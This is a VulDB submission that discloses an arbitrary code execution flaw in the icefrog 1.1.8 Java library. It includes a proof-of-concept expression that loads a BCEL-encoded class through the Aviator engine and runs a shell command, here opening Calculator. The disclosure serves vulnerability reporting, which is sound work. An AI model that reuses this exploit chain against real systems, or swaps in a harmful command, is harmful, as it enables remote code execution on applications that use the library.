Submit #169999: icefrog v1.1.8 Has an Execute Arbitrary Code vulnerability

Title: icefrog v1.1.8 Has an Execute Arbitrary Code vulnerability
Description: IceFrog is a suite of core and expanded libraries that include utility classes, collections, I/O classes, and much more, a tool like Guava, Apache Commons and Hutool. In icefrog 1.1.8, the reference enters the aviator engine to parse the expression, and the aviator expression can directly enter the new object, but it is not allowed to call non-public static methods. You can use BCELClassloader to load BCEL code to accomplish RCE. When a user uses icefrog to parse an expression, the aviator template engine is triggered, leading to an arbitrary code execution vulnerability. The test code is here:

    import com.whaleal.icefrog.extra.expression.ExpressionUtil;
    String exp = "'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$5dP$cbJ$c3$40$U$3d$d3$a6M$8d$d1$b6$d6$fa$CAW$a6$5d$98$8d$bb$88$hQ$Q$8a$V$x$ee$93x$JS$f2$uy$94$7c$96nT$5c$f8$B$7e$94x$tJ$5b$i$98s$ef$3d$9c$3b$e70_$df$l$9f$A$cep$60$a0$81$8e$81$$$b6$U$f4tl$eb$e8$L4$cfe$y$f3$L$81$ba5x$U$d0$$$93$t$Sh$8fdL$b7E$e4Q$fa$e0z$n3$g$95$e4$L$9cX$a3$a9$3bw$ed$d0$8d$D$7b$92$a72$O$9c$c1$Ku$97$s$3ee$99$p$60$5c$95$3e$cdr$99$c4$99$8e$j$9e$tI$91$fat$z$d5kk4$97$e1$a9Z3$d1$84$aec$d7$c4$k$f6M$YX$X$e8$qi$60S$e9F$b3$90l$a5dji1$f6$a6$e4$e7$C$bd$8a$92$89$7d3$5eX$Jt$97$c2$fb$o$cee$c4nF$40$f9b$e8$5b$aby$ffh$H$c7$d0$f8$83$d4$a9A$a8L$8c$z$9e$O$b9$K$ae$8d$e1$h$c4$L7$i$9e$b1$f9Kr$cf$89yEI$8f$aaU$a0$f5$8e$da$f0$V$f5$e7$7fj$j$s$a3$c6$fd$G$df$cd$ca$aa$fd$D$fe$90$a41$a1$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"open /System/Applications/Calculator.app\") );";
    final Object eval = ExpressionUtil.eval(exp, null);
Source: https://github.com/NanKeXXX/selfVuln_poc/blob/main/whaleal%3Aicefrog/icefrog_1.1.8_RCE.md
User: dreamfly (UID 37785)
Submission: 15/06/2023 08:58 (3 years ago)
Moderation: 18/06/2023 09:49 (3 days later)
Status: Accepted
VulDB Entry: 231804 [whaleal IceFrog 1.1.8 Aviator Template Engine privilege escalation]
Points: 20
